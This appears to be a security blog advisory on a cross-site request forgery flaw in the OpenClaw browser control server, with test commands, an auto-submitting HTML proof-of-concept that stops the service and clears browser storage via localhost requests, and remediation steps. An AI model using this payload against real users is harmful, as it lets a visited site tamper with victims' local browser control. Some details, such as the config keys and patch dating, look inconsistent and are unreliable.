Listen to this Post
The vulnerability exists because the OpenClaw browser control server binds to loopback (localhost) but fails to validate the Origin or Referer headers of incoming HTTP requests . Browsers inherently permit cross-origin requests to be sent to loopback addresses from malicious external websites. The exposed endpoints that handle state-changing operations (POST/PUT/PATCH/DELETE) lack a CSRF-style guard, meaning they cannot distinguish between a legitimate request originating from the local user interface and a forged request coming from a malicious site the victim visits . An attacker can host a website that, when visited by a victim running an affected OpenClaw instance, triggers unauthorized commands through the victim’s browser. These commands can include opening or closing browser tabs, modifying storage or cookies, or starting/stopping the browser control service itself, effectively allowing a remote attacker to manipulate the victim’s local browser control plane without any explicit validation of the request’s origin .
Platform: OpenClaw (npm)
Version: <= 2026.2.13
Vulnerability: Cross-Site Request Forgery
Severity: High
Date: 2026-02-18
Prediction: Patched 2026-02-14
What Undercode Say:
Analytics
The vulnerability is triggered by a lack of Origin/Referer header validation on loopback-bound mutation endpoints. The following can be used to test if a system is vulnerable by inspecting the server’s behavior.
1. Check current OpenClaw version
openclaw --version
2. Simulate a malicious cross-origin request using curl
(This bypasses browser context but tests endpoint mutability)
curl -X POST http://localhost:PORT/browser/control \
-H "Origin: https://malicious-site.com" \
-H "Referer: https://malicious-site.com/page" \
-d '{"action":"stop"}'
3. Check server logs for accepted cross-origin requests
grep "POST /browser/control" ~/.openclaw/logs/gateway.log | grep "Origin: https://malicious-site.com"
Exploit
A malicious HTML page can be crafted to force the victim’s browser to send unauthorized commands to the local OpenClaw instance.
<!-- Exploit: csrf_openclaw.html -->
<html>
<body>
<h1>Proof of Concept</h1>
<form id="csrf-form" action="http://localhost:PORT/browser/control" method="POST">
<input type="hidden" name="action" value="stop" />
</form>
<script>
// Automatically submit the form
document.getElementById('csrf-form').submit();
// Alternative: Use fetch API for PUT/DELETE
fetch('http://localhost:PORT/browser/storage/clear', {
method: 'DELETE',
mode: 'no-cors', // Forces the request to be sent even without CORS preflight
headers: { 'Origin': 'https://malicious-site.com' }
});
</script>
</body>
</html>
Protection
The primary fix involves validating the Origin and Referer headers to reject any request that originates from a non-loopback context . Additional hardening includes mandatory authentication.
1. Upgrade to the patched version (includes commit b566b09) npm install -g openclaw@latest 2. Verify the fix is applied (check for Origin validation in config) grep "originValidation" ~/.openclaw/config.yaml || echo "strict_origin: true" >> ~/.openclaw/config.yaml 3. Enable mandatory authentication (auto-generated token in new versions) openclaw config set auth.required true openclaw config set auth.token "$(openssl rand -hex 32)" 4. Restart the service to apply changes systemctl --user restart openclaw-gateway
Impact
A successful exploit allows a malicious website to perform unauthorized state-changing operations on the victim’s local OpenClaw browser control plane without user interaction . This includes the ability to open or close browser tabs, modify stored cookies and local storage, and start or stop the browser control service itself . By chaining this with other vulnerabilities (such as token leakage), an attacker could escalate this to remote code execution on the host system . The attack is zero-click; simply visiting a malicious website is sufficient to trigger the exploit .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

